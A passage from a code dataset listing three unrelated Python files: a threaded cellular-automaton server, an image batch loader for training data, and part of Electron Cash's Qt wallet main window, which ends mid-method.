source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
server.py
|
import itertools
import numpy
import threading
import time
import notification
import commander
delay = 1
low_delay = 1 / 24
board = numpy.matrix([[1, 0, 0], [0, 1, 0], [0, 0, 1]])
next_step = lambda x, i, j: x[i, j]
isRunning = False
def listener():
while True:
m = raw_input() # type: str
m = m.strip()
m = m.split(' ') # type: list[str]
commander.execute_command(*m)
time.sleep(0.01)
def calc():
global board
new_borad = numpy.matrix(board)
for (i, j) in list(itertools.product(range(board.shape[0]), range(board.shape[1]))):
new_borad[i, j] = int(next_step(board, i, j))
board = new_borad
def calculator():
global board, next_step
while True:
if isRunning:
calc()
commander.execute_command('board')
time.sleep(delay)
listener_thread = threading.Thread(target=listener)
listener_thread.start()
calculator_thread = threading.Thread(target=calculator)
calculator_thread.start()
|
ImageLoader.py
|
# -*- coding: utf-8 -*-
"""
Created on Thu Feb 17 22:43:46 2022
"""
import os
from PIL import Image
from PIL import ImageEnhance
import numpy as np
import random
import threading
class ImageLoader:
'''
This image loader returns a generator that always load a portion of images from a image directory
'''
__img_dir = None
__img_list =[]
__imageCounter = 0
def __init__(self, img_dir : str):
'''
init image generator
Parameters
----------
img_dir : str
image dataset directory
Returns
-------
None.
'''
self.__img_dir = img_dir
#read filenames to list
self.__img_list = os.listdir(img_dir)
#shuffle
random.seed()
random.shuffle(self.__img_list)
def __loadPreloadBatch(self, buffer, batchSize, batchPreloadSize, imageSize):
'''
load (batchPreloadSize) batches of images into buffer
Parameters
----------
buffer : TYPE
target buffer
batchPreloadSize : int
preload how many batches
imageSize
output image size
Returns
-------
None.
'''
for i in range(batchSize * batchPreloadSize):
#load img
PILImage = Image.open(self.__img_dir + '/' + self.__img_list[self.__imageCounter])
#random crop
width, height = PILImage.size
PILImage = PILImage.crop((random.randint(0, 15), random.randint(0, 15), width - random.randint(0, 15), height - random.randint(0, 15)))
#random color tweak
enhance_range = 0.3
PILImage = ImageEnhance.Brightness(PILImage).enhance(1 + np.random.uniform(0, enhance_range) - (enhance_range/2))
PILImage = ImageEnhance.Color(PILImage).enhance(1 + np.random.uniform(0, enhance_range) - (enhance_range/2))
PILImage = ImageEnhance.Contrast(PILImage).enhance(1 + np.random.uniform(0, enhance_range) - (enhance_range/2))
#convert to numpy array
img = np.asarray(PILImage.convert('RGB').resize((imageSize, imageSize)))/255
buffer[i, :] = img
self.__imageCounter += 1
# if counter > batchSize, repeat again
self.__imageCounter %= len(self.__img_list)
def getGenerator(self, batchSize: int, batchPreloadSize = 2, batchReuseSize = 2, imageSize = 256):
'''
returns a generator that will load (batchSize) images everytime
this generator will load images sequentially, and repeat after
the last image is loaded
Parameters
----------
batchSize : int
load how many images
batchPreloadSize : int
preload how many batch of images into memory
batchReuseSize
How many times the generator will reuse images from preloaded data before loading new data
imageSize
output image height and width
Returns
-------
(batchSize, imageSize, imageSize, 3) numpy array
'''
#batch size check
if batchSize < 1:
raise RuntimeError('batch size must larger than 0')
#allocate space for images
X = np.zeros((batchSize, imageSize, imageSize, 3), np.float32)
#avoid negative numbers
if batchPreloadSize < 1:
batchPreloadSize = 1
if batchReuseSize < 1:
batchReuseSize = 1
#preload buffer
buffer = [np.zeros((batchSize * batchPreloadSize, imageSize, imageSize, 3), np.float32()), np.zeros((batchSize * batchPreloadSize, imageSize, imageSize, 3), np.float32())]
currentBuffer = 0
task = None
#load first buffer
self.__loadPreloadBatch(buffer[currentBuffer], batchSize, batchPreloadSize, imageSize)
#never ends, always load more images
while True:
#load next buffer in different thread
task = threading.Thread(target = self.__loadPreloadBatch, args = (buffer[not currentBuffer], batchSize, batchPreloadSize, imageSize))
task.start()
#use image data from buffer
for j in range(batchReuseSize):
for i in range(batchPreloadSize):
X[:] = buffer[currentBuffer][i * batchSize : (i + 1) * batchSize]
#return generator
yield X
#swap buffer
currentBuffer = not currentBuffer
#wait until loading thread finish it's work
task.join()
def xToXY(gen):
'''
This function duplicates the return data from a generator
and warps it into a tuple
Parameters
----------
gen : TYPE
generator
Returns
-------
a generator that returns a tuple
'''
try:
while True:
X = next(gen)
yield (X, X)
except:
pass
|
main_window.py
|
#!/usr/bin/env python3
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys, time, threading
import os, json, traceback
import shutil
import csv
from decimal import Decimal as PyDecimal # Qt 5.12 also exports Decimal
import base64
from functools import partial
from collections import OrderedDict
from PyQt5.QtGui import *
from PyQt5.QtCore import *
from PyQt5.QtWidgets import *
from electroncash import keystore, get_config
from electroncash.address import Address, ScriptOutput
from electroncash.bitcoin import COIN, TYPE_ADDRESS, TYPE_SCRIPT
from electroncash import networks
from electroncash.plugins import run_hook
from electroncash.i18n import _
from electroncash.util import (format_time, format_satoshis, PrintError,
format_satoshis_plain, NotEnoughFunds,
ExcessiveFee, UserCancelled, InvalidPassword,
bh2u, bfh, format_fee_satoshis, Weak,
print_error)
import electroncash.web as web
from electroncash import Transaction
from electroncash import util, bitcoin, commands
from electroncash import paymentrequest
from electroncash.wallet import Multisig_Wallet, sweep_preparations
try:
from electroncash.plot import plot_history
except:
plot_history = None
import electroncash.web as web
from .amountedit import AmountEdit, BTCAmountEdit, MyLineEdit, BTCkBEdit, BTCSatsByteEdit
from .qrcodewidget import QRCodeWidget, QRDialog
from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit
from .transaction_dialog import show_transaction
from .fee_slider import FeeSlider
from .popup_widget import ShowPopupLabel, KillPopupLabel, PopupWidget
from .util import *
class StatusBarButton(QPushButton):
def __init__(self, icon, tooltip, func):
QPushButton.__init__(self, icon, '')
self.setToolTip(tooltip)
self.setFlat(True)
self.setMaximumWidth(25)
self.clicked.connect(self.onPress)
self.func = func
self.setIconSize(QSize(25,25))
self.setCursor(Qt.PointingHandCursor)
def onPress(self, checked=False):
'''Drops the unwanted PyQt5 "checked" argument'''
self.func()
def keyPressEvent(self, e):
if e.key() == Qt.Key_Return:
self.func()
from electroncash.paymentrequest import PR_PAID
class ElectrumWindow(QMainWindow, MessageBoxMixin, PrintError):
# Note: self.clean_up_connections automatically detects signals named XXX_signal and disconnects them on window close.
payment_request_ok_signal = pyqtSignal()
payment_request_error_signal = pyqtSignal()
new_fx_quotes_signal = pyqtSignal()
new_fx_history_signal = pyqtSignal()
network_signal = pyqtSignal(str, object)
alias_received_signal = pyqtSignal()
computing_privkeys_signal = pyqtSignal()
show_privkeys_signal = pyqtSignal()
history_updated_signal = pyqtSignal()
labels_updated_signal = pyqtSignal() # note this signal occurs when an explicit update_labels() call happens. Interested GUIs should also listen for history_updated_signal as well which also indicates labels may have changed.
on_timer_signal = pyqtSignal() # functions wanting to be executed from timer_actions should connect to this signal, preferably via Qt.DirectConnection
status_icon_dict = dict() # app-globel cache of "status_*" -> QIcon instances (for update_status() speedup)
def __init__(self, gui_object, wallet):
QMainWindow.__init__(self)
self.gui_object = gui_object
self.wallet = wallet
self.config = config = gui_object.config
self.network = gui_object.daemon.network
self.fx = gui_object.daemon.fx
self.invoices = wallet.invoices
self.contacts = wallet.contacts
self.tray = gui_object.tray
self.app = gui_object.app
self.cleaned_up = False
self.payment_request = None
self.checking_accounts = False
self.qr_window = None
self.not_enough_funds = False
self.op_return_toolong = False
self.internalpluginsdialog = None
self.externalpluginsdialog = None
self.hardwarewalletdialog = None
self.require_fee_update = False
self.cashaddr_toggled_signal = self.gui_object.cashaddr_toggled_signal # alias for backwards compatibility for plugins -- this signal used to live in each window and has since been refactored to gui-object where it belongs (since it's really an app-global setting)
self.force_use_single_change_addr = None # this is set by the CashShuffle plugin to a single string that will go into the tool-tip explaining why this preference option is disabled (see self.settings_dialog)
self.tl_windows = []
self.tx_external_keypairs = {}
self._tx_dialogs = Weak.Set()
self.tx_update_mgr = TxUpdateMgr(self) # manages network callbacks for 'new_transaction' and 'verified2', and collates GUI updates from said callbacks as a performance optimization
self.is_schnorr_enabled = self.wallet.is_schnorr_enabled # This is a function -- Support for plugins that may be using the 4.0.3 & 4.0.4 API -- this function used to live in this class, before being moved to Abstract_Wallet.
self.send_tab_opreturn_widgets, self.receive_tab_opreturn_widgets = [], [] # defaults to empty list
self.create_status_bar()
self.need_update = threading.Event()
self.labels_need_update = threading.Event()
self.decimal_point = config.get('decimal_point', 8)
self.fee_unit = config.get('fee_unit', 0)
self.num_zeros = int(config.get('num_zeros',0))
self.completions = QStringListModel()
self.tabs = tabs = QTabWidget(self)
self.send_tab = self.create_send_tab()
self.receive_tab = self.create_receive_tab()
self.addresses_tab = self.create_addresses_tab()
self.utxo_tab = self.create_utxo_tab()
self.console_tab = self.create_console_tab()
self.contacts_tab = self.create_contacts_tab()
self.converter_tab = self.create_converter_tab()
tabs.addTab(self.create_history_tab(), QIcon(":icons/tab_history.png"), _('History'))
tabs.addTab(self.send_tab, QIcon(":icons/tab_send.png"), _('Send'))
tabs.addTab(self.receive_tab, QIcon(":icons/tab_receive.png"), _('Receive'))
# clears/inits the opreturn widgets
self.on_toggled_opreturn(bool(self.config.get('enable_opreturn')))
def add_optional_tab(tabs, tab, icon, description, name, default=False):
tab.tab_icon = icon
tab.tab_description = description
tab.tab_pos = len(tabs)
tab.tab_name = name
if self.config.get('show_{}_tab'.format(name), default):
tabs.addTab(tab, icon, description.replace("&", ""))
add_optional_tab(tabs, self.addresses_tab, QIcon(":icons/tab_addresses.png"), _("&Addresses"), "addresses")
add_optional_tab(tabs, self.utxo_tab, QIcon(":icons/tab_coins.png"), _("Co&ins"), "utxo")
add_optional_tab(tabs, self.contacts_tab, QIcon(":icons/tab_contacts.png"), _("Con&tacts"), "contacts")
add_optional_tab(tabs, self.converter_tab, QIcon(":icons/tab_converter.svg"), _("Address Converter"), "converter", True)
add_optional_tab(tabs, self.console_tab, QIcon(":icons/tab_console.png"), _("Con&sole"), "console")
tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
self.setCentralWidget(tabs)
if self.config.get("is_maximized"):
self.showMaximized()
self.init_menubar()
wrtabs = Weak(tabs)
QShortcut(QKeySequence("Ctrl+W"), self, self.close)
QShortcut(QKeySequence("Ctrl+Q"), self, self.close)
QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet)
QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1)%wrtabs.count()))
QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1)%wrtabs.count()))
for i in range(wrtabs.count()):
QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs.setCurrentIndex(i))
self.gui_object.cashaddr_toggled_signal.connect(self.update_cashaddr_icon)
self.payment_request_ok_signal.connect(self.payment_request_ok)
self.payment_request_error_signal.connect(self.payment_request_error)
self.gui_object.update_available_signal.connect(self.on_update_available) # shows/hides the update_available_button, emitted by update check mechanism when a new version is available
self.history_list.setFocus(True)
# update fee slider in case we missed the callback
self.fee_slider.update()
self.load_wallet(wallet)
if self.network:
self.network_signal.connect(self.on_network_qt)
interests = ['blockchain_updated', 'wallet_updated',
'new_transaction', 'status', 'banner', 'verified2',
'fee']
# To avoid leaking references to "self" that prevent the
# window from being GC-ed when closed, callbacks should be
# methods of this class only, and specifically not be
# partials, lambdas or methods of subobjects. Hence...
self.network.register_callback(self.on_network, interests)
# set initial message
self.console.showMessage(self.network.banner)
self.network.register_callback(self.on_quotes, ['on_quotes'])
self.network.register_callback(self.on_history, ['on_history'])
self.new_fx_quotes_signal.connect(self.on_fx_quotes)
self.new_fx_history_signal.connect(self.on_fx_history)
gui_object.timer.timeout.connect(self.timer_actions)
self.fetch_alias()
_first_shown = True
def showEvent(self, event):
super().showEvent(event)
if event.isAccepted() and self._first_shown:
self._first_shown = False
weakSelf = Weak.ref(self)
#
#try:
# # Amaury's recommendation -- only remind a subset of users to enable it.
# self.remind_cashshuffle_enabled = bool(int.from_bytes(bytes.fromhex(self.wallet.get_public_key(self.wallet.get_addresses()[0])), byteorder='big') & 0x3)
#except (AttributeError, ValueError, TypeError):
# # wallet lacks the get_public_key method
# self.remind_cashshuffle_enabled = False
self.remind_cashshuffle_enabled = False # For now globally disabled
#QTimer.singleShot(300, lambda: weakSelf() and weakSelf().do_cash_shuffle_reminder())
#
# do this immediately after this event handler finishes -- noop on everything but linux
QTimer.singleShot(0, lambda: weakSelf() and weakSelf().gui_object.lin_win_maybe_show_highdpi_caveat_msg(weakSelf()))
def on_history(self, event, *args):
# NB: event should always be 'on_history'
if not args or args[0] is self.wallet:
self.new_fx_history_signal.emit()
@rate_limited(3.0) # Rate limit to no more than once every 3 seconds
def on_fx_history(self):
if self.cleaned_up: return
self.history_list.refresh_headers()
self.history_list.update()
self.address_list.update()
self.history_updated_signal.emit() # inform things like address_dialog that there's a new history
def on_quotes(self, b):
self.new_fx_quotes_signal.emit()
@rate_limited(3.0) # Rate limit to no more than once every 3 seconds
def on_fx_quotes(self):
if self.cleaned_up: return
self.update_status()
# Refresh edits with the new rate
edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e
edit.textEdited.emit(edit.text())
edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e
edit.textEdited.emit(edit.text())
# History tab needs updating if it used spot
if self.fx.history_used_spot:
self.history_list.update()
self.history_updated_signal.emit() # inform things like address_dialog that there's a new history
def toggle_tab(self, tab):
show = self.tabs.indexOf(tab) == -1
self.config.set_key('show_{}_tab'.format(tab.tab_name), show)
item_format = _("Hide {tab_description}") if show else _("Show {tab_description}")
item_text = item_format.format(tab_description=tab.tab_description)
tab.menu_action.setText(item_text)
if show:
# Find out where to place the tab
index = len(self.tabs)
for i in range(len(self.tabs)):
try:
if tab.tab_pos < self.tabs.widget(i).tab_pos:
index = i
break
except AttributeError:
pass
self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", ""))
else:
i = self.tabs.indexOf(tab)
self.tabs.removeTab(i)
def push_top_level_window(self, window):
'''Used for e.g. tx dialog box to ensure new dialogs are appropriately
parented. This used to be done by explicitly providing the parent
window, but that isn't something hardware wallet prompts know.'''
self.tl_windows.append(window)
def pop_top_level_window(self, window):
self.tl_windows.remove(window)
def top_level_window(self):
'''Do the right thing in the presence of tx dialog windows'''
override = self.tl_windows[-1] if self.tl_windows else None
return self.top_level_window_recurse(override)
def diagnostic_name(self):
return "%s/%s" % (PrintError.diagnostic_name(self), self.wallet.basename())
def is_hidden(self):
return self.isMinimized() or self.isHidden()
def show_or_hide(self):
if self.is_hidden():
self.bring_to_top()
else:
self.hide()
def bring_to_top(self):
self.show()
self.raise_()
def on_error(self, exc_info):
if not isinstance(exc_info[1], UserCancelled):
try:
traceback.print_exception(*exc_info)
except OSError:
# Issue #662, user got IO error.
# We want them to still get the error displayed to them.
pass
self.show_error(str(exc_info[1]))
def on_network(self, event, *args):
#self.print_error("on_network:", event, *args)
if event == 'wallet_updated':
if args[0] is self.wallet:
self.need_update.set()
elif event == 'blockchain_updated':
self.need_update.set()
elif event == 'new_transaction':
self.tx_update_mgr.notif_add(args) # added only if this wallet's tx
if args[1] is self.wallet:
self.network_signal.emit(event, args)
elif event == 'verified2':
self.tx_update_mgr.verif_add(args) # added only if this wallet's tx
elif event in ['status', 'banner', 'fee']:
# Handle in GUI thread
self.network_signal.emit(event, args)
else:
self.print_error("unexpected network message:", event, args)
def on_network_qt(self, event, args=None):
if self.cleaned_up: return
# Handle a network message in the GUI thread
if event == 'status':
self.update_status()
elif event == 'banner':
self.console.showMessage(args[0])
elif event == 'fee':
pass
elif event == 'new_transaction':
self.check_and_reset_receive_address_if_needed()
else:
self.print_error("unexpected network_qt signal:", event, args)
def fetch_alias(self):
self.alias_info = None
alias = self.config.get('alias')
if alias:
alias = str(alias)
def f():
self.alias_info = self.contacts.resolve_openalias(alias)
self.alias_received_signal.emit()
t = threading.Thread(target=f)
t.setDaemon(True)
t.start()
def _close_wallet(self):
if self.wallet:
self.print_error('close_wallet', self.wallet.storage.path)
self.wallet.thread = None
run_hook('close_wallet', self.wallet)
def load_wallet(self, wallet):
wallet.thread = TaskThread(self, self.on_error, name = wallet.diagnostic_name() + '/Wallet')
self.update_recently_visited(wallet.storage.path)
# address used to create a dummy transaction and estimate transaction fee
self.history_list.update()
self.address_list.update()
self.utxo_list.update()
self.need_update.set()
# update menus
self.seed_menu.setEnabled(self.wallet.has_seed())
self.update_lock_icon()
self.update_buttons_on_seed()
self.update_console()
self.clear_receive_tab()
self.request_list.update()
self.tabs.show()
self.init_geometry()
if self.config.get('hide_gui') and self.tray.isVisible():
self.hide()
else:
self.show()
if self._is_invalid_testnet_wallet():
self.gui_object.daemon.stop_wallet(self.wallet.storage.path)
self._rebuild_history_action.setEnabled(False)
self._warn_if_invalid_testnet_wallet()
self.watching_only_changed()
self.history_updated_signal.emit() # inform things like address_dialog that there's a new history
run_hook('load_wallet', wallet, self)
def init_geometry(self):
winpos = self.wallet.storage.get("winpos-qt")
try:
screen = self.app.desktop().screenGeometry()
assert screen.contains(QRect(*winpos))
self.setGeometry(*winpos)
except:
self.print_error("using default geometry")
self.setGeometry(100, 100, 840, 400)
def watching_only_changed(self):
title = '%s %s - %s' % (networks.net.TITLE,
self.wallet.electrum_version,
self.wallet.basename())
extra = [self.wallet.storage.get('wallet_type', '?')]
if self.wallet.is_watching_only():
self.warn_if_watching_only()
extra.append(_('watching only'))
title += ' [%s]'% ', '.join(extra)
self.setWindowTitle(title)
self.password_menu.setEnabled(self.wallet.can_change_password())
self.import_privkey_menu.setVisible(self.wallet.can_import_privkey())
self.import_address_menu.setVisible(self.wallet.can_import_address())
self.export_menu.setEnabled(self.wallet.can_export())
def warn_if_watching_only(self):
if self.wallet.is_watching_only():
msg = ' '.join([
_("This wallet is watching-only."),
_("This means you will not be able to spend Bitcoin Cash with it."),
_("Make sure you own the seed phrase or the private keys, before you request Bitcoin Cash to be sent to this wallet.")
])
self.show_warning(msg, title=_('Information'))
def _is_invalid_testnet_wallet(self):
if not networks.net.TESTNET:
return False
is_old_bad = False
xkey = ((hasattr(self.wallet, 'get_master_public_key') and self.wallet.get_master_public_key())
or None)
if xkey:
from electroncash.bitcoin import deserialize_xpub, InvalidXKeyFormat
try:
xp = deserialize_xpub(xkey)
except InvalidXKeyFormat:
is_old_bad = True
return is_old_bad
def _warn_if_invalid_testnet_wallet(self):
''' This was added after the upgrade from the bad xpub testnet wallets
to the good tpub testnet wallet format in version 3.3.6. See #1164.
We warn users if they are using the bad wallet format and instruct
them on how to upgrade their wallets.'''
is_old_bad = self._is_invalid_testnet_wallet()
if is_old_bad:
msg = ' '.join([
_("This testnet wallet has an invalid master key format."),
_("(Old versions of Electron Cash before 3.3.6 produced invalid testnet wallets)."),
'<br><br>',
_("In order to use this wallet without errors with this version of EC, please <b>re-generate this wallet from seed</b>."),
"<br><br><em><i>~SPV stopped~</i></em>"
])
self.show_critical(msg, title=_('Invalid Master Key'), rich_text=True)
return is_old_bad
def open_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
if not os.path.exists(wallet_folder):
wallet_folder = None
filename, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if not filename:
return
if filename.lower().endswith('.txn'):
# they did File -> Open on a .txn, just do that.
self.do_process_from_file(fileName=filename)
return
self.gui_object.new_window(filename)
def backup_wallet(self):
path = self.wallet.storage.path
wallet_folder = os.path.dirname(path)
filename, __ = QFileDialog.getSaveFileName(self, _('Enter a filename for the copy of your wallet'), wallet_folder)
if not filename:
return
new_path = os.path.join(wallet_folder, filename)
if new_path != path:
try:
# Copy file contents
shutil.copyfile(path, new_path)
# Copy file attributes if possible
# (not supported on targets like Flatpak documents)
try:
shutil.copystat(path, new_path)
except (IOError, os.error):
pass
self.show_message(_("A copy of your wallet file was created in")+" '%s'" % str(new_path), title=_("Wallet backup created"))
except (IOError, os.error) as reason:
self.show_critical(_("Electron Cash was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup"))
def update_recently_visited(self, filename):
recent = self.config.get('recently_open', [])
try:
sorted(recent)
except:
recent = []
if filename in recent:
recent.remove(filename)
recent.insert(0, filename)
recent2 = []
for k in recent:
if os.path.exists(k):
recent2.append(k)
recent = recent2[:5]
self.config.set_key('recently_open', recent)
self.recently_visited_menu.clear()
gui_object = self.gui_object
for i, k in enumerate(sorted(recent)):
b = os.path.basename(k)
def loader(k):
return lambda: gui_object.new_window(k)
self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1)))
self.recently_visited_menu.setEnabled(len(recent))
def get_wallet_folder(self):
return self.gui_object.get_wallet_folder()
def new_wallet(self):
try:
full_path = self.gui_object.get_new_wallet_path()
except FileNotFoundError as e:
self.show_error(str(e))
return
self.gui_object.start_new_window(full_path, None)
def init_menubar(self):
menubar = self.menuBar()
menubar.setObjectName(self.diagnostic_name() + ".QMenuBar")
destroyed_print_error(menubar)
file_menu = menubar.addMenu(_("&File"))
self.recently_visited_menu = file_menu.addMenu(_("&Recently open"))
file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open)
file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New)
file_menu.addAction(_("&Save Copy"), self.backup_wallet).setShortcut(QKeySequence.SaveAs)
file_menu.addAction(_("Delete"), self.remove_wallet)
file_menu.addSeparator()
file_menu.addAction(_("&Quit"), self.close)
wallet_menu = menubar.addMenu(_("&Wallet"))
wallet_menu.addAction(_("&Information"), self.show_master_public_keys)
wallet_menu.addSeparator()
self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog)
self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog)
self.private_keys_menu = wallet_menu.addMenu(_("&Private keys"))
self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog)
self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey)
self.export_menu = self.private_keys_menu.addAction(_("&Export"), self.export_privkeys_dialog)
self.import_address_menu = wallet_menu.addAction(_("Import addresses"), self.import_addresses)
wallet_menu.addSeparator()
self._rebuild_history_action = wallet_menu.addAction(_("&Rebuild history"), self.rebuild_history)
self._scan_beyond_gap_action = wallet_menu.addAction(_("&Scan beyond gap..."), self.scan_beyond_gap)
self._scan_beyond_gap_action.setEnabled(bool(self.wallet.is_deterministic() and self.network))
wallet_menu.addSeparator()
labels_menu = wallet_menu.addMenu(_("&Labels"))
labels_menu.addAction(_("&Import"), self.do_import_labels)
labels_menu.addAction(_("&Export"), self.do_export_labels)
contacts_menu = wallet_menu.addMenu(_("Contacts"))
contacts_menu.addAction(_("&New"), self.new_contact_dialog)
contacts_menu.addAction(_("Import"), lambda: self.contact_list.import_contacts())
contacts_menu.addAction(_("Export"), lambda: self.contact_list.export_contacts())
invoices_menu = wallet_menu.addMenu(_("Invoices"))
invoices_menu.addAction(_("Import"), lambda: self.invoice_list.import_invoices())
hist_menu = wallet_menu.addMenu(_("&History"))
#hist_menu.addAction(_("Plot"), self.plot_history_dialog).setEnabled(plot_history is not None)
hist_menu.addAction(_("Export"), self.export_history_dialog)
wallet_menu.addSeparator()
wallet_menu.addAction(_("Find"), self.toggle_search).setShortcut(QKeySequence("Ctrl+F"))
def add_toggle_action(view_menu, tab):
is_shown = self.tabs.indexOf(tab) > -1
item_format = _("Hide {tab_description}") if is_shown else _("Show {tab_description}")
item_name = item_format.format(tab_description=tab.tab_description)
tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab))
view_menu = menubar.addMenu(_("&View"))
add_toggle_action(view_menu, self.addresses_tab)
add_toggle_action(view_menu, self.utxo_tab)
add_toggle_action(view_menu, self.contacts_tab)
add_toggle_action(view_menu, self.converter_tab)
add_toggle_action(view_menu, self.console_tab)
tools_menu = menubar.addMenu(_("&Tools"))
# Settings / Preferences are all reserved keywords in OSX using this as work around
tools_menu.addAction(_("Electron Cash preferences") if sys.platform == 'darwin' else _("Preferences"), self.settings_dialog)
gui_object = self.gui_object
weakSelf = Weak.ref(self)
tools_menu.addAction(_("&Network"), lambda: gui_object.show_network_dialog(weakSelf()))
tools_menu.addAction(_("Optional &Features"), self.internal_plugins_dialog)
tools_menu.addAction(_("Installed &Plugins"), self.external_plugins_dialog)
if sys.platform in ('linux', 'linux2', 'linux3'):
tools_menu.addSeparator()
tools_menu.addAction(_("&Hardware wallet support..."), self.hardware_wallet_support)
tools_menu.addSeparator()
tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message)
tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message)
tools_menu.addSeparator()
paytomany_menu = tools_menu.addAction(_("&Pay to many"), self.paytomany)
raw_transaction_menu = tools_menu.addMenu(_("&Load transaction"))
raw_transaction_menu.addAction(_("From &file"), self.do_process_from_file)
raw_transaction_menu.addAction(_("From &text"), self.do_process_from_text)
raw_transaction_menu.addAction(_("From the &blockchain"), self.do_process_from_txid)
raw_transaction_menu.addAction(_("From &QR code"), self.read_tx_from_qrcode)
self.raw_transaction_menu = raw_transaction_menu
run_hook('init_menubar_tools', self, tools_menu)
help_menu = menubar.addMenu(_("&Help"))
help_menu.addAction(_("&About"), self.show_about)
help_menu.addAction(_("&Check for updates..."), lambda: self.gui_object.show_update_checker(self))
help_menu.addAction(_("&Official website"), lambda: webopen("https://electroncash.org"))
help_menu.addSeparator()
help_menu.addAction(_("Documentation"), lambda: webopen("http://electroncash.readthedocs.io/")).setShortcut(QKeySequence.HelpContents)
help_menu.addAction(_("&Report Bug"), self.show_report_bug)
help_menu.addSeparator()
help_menu.addAction(_("&Donate to server"), self.donate_to_server)
def donate_to_server(self):
d = self.network.get_donation_address()
if d:
host = self.network.get_parameters()[0]
# The message is intentionally untranslated, leave it like that
self.pay_to_URI('{}:{}?message=donation for {}'
.format(networks.net.CASHADDR_PREFIX, d, host))
else:
self.show_error(_('No donation address for this server'))
def show_about(self):
QMessageBox.about(self, "Electron Cash",
_("Version")+" %s" % (self.wallet.electrum_version) + "\n\n" +
_("Electron Cash's focus is speed, with low resource usage and simplifying Bitcoin Cash. You do not need to perform regular backups, because your wallet can be recovered from a secret phrase that you can memorize or write on paper. Startup times are instant because it operates in conjunction with high-performance servers that handle the most complicated parts of the Bitcoin Cash system." + "\n\n" +
_("Uses icons from the Icons8 icon pack (icons8.com).")))
def show_report_bug(self):
msg = ' '.join([
_("Please report any bugs as issues on github:<br/>"),
"<a href=\"https://github.com/Electron-Cash/Electron-Cash/issues\">https://github.com/Electron-Cash/Electron-Cash/issues</a><br/><br/>",
_("Before reporting a bug, upgrade to the most recent version of Electron Cash (latest release or git HEAD), and include the version number in your report."),
_("Try to explain not only what the bug is, but how it occurs.")
])
self.show_message(msg, title="Electron Cash - " + _("Reporting Bugs"), rich_text = True)
def notify(self, message):
self.gui_object.notify(message)
# custom wrappers for getOpenFileName and getSaveFileName, that remember the path selected by the user
def getOpenFileName(self, title, filter = ""):
return __class__.static_getOpenFileName(title=title, filter=filter, config=self.config, parent=self)
def getSaveFileName(self, title, filename, filter = ""):
return __class__.static_getSaveFileName(title=title, filename=filename, filter=filter, config=self.config, parent=self)
@staticmethod
def static_getOpenFileName(*, title, parent=None, config=None, filter=""):
if not config:
config = get_config()
userdir = os.path.expanduser('~')
directory = config.get('io_dir', userdir) if config else userdir
fileName, __ = QFileDialog.getOpenFileName(parent, title, directory, filter)
if fileName and directory != os.path.dirname(fileName) and config:
config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
@staticmethod
def static_getSaveFileName(*, title, filename, parent=None, config=None, filter=""):
if not config:
config = get_config()
userdir = os.path.expanduser('~')
directory = config.get('io_dir', userdir) if config else userdir
path = os.path.join( directory, filename )
fileName, __ = QFileDialog.getSaveFileName(parent, title, path, filter)
if fileName and directory != os.path.dirname(fileName) and config:
config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def timer_actions(self):
# Note this runs in the GUI thread
if self.need_update.is_set():
self._update_wallet() # will clear flag when it runs. (also clears labels_need_update as well)
if self.labels_need_update.is_set():
self._update_labels() # will clear flag when it runs.
# resolve aliases
# FIXME this is a blocking network call that has a timeout of 5 sec
self.payto_e.resolve()
# update fee
if self.require_fee_update:
self.do_update_fee()
self.require_fee_update = False
# hook for other classes to be called here. For example the tx_update_mgr is called here (see TxUpdateMgr.do_check).
self.on_timer_signal.emit()
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, self.num_zeros, self.decimal_point, is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, amount, is_diff=False):
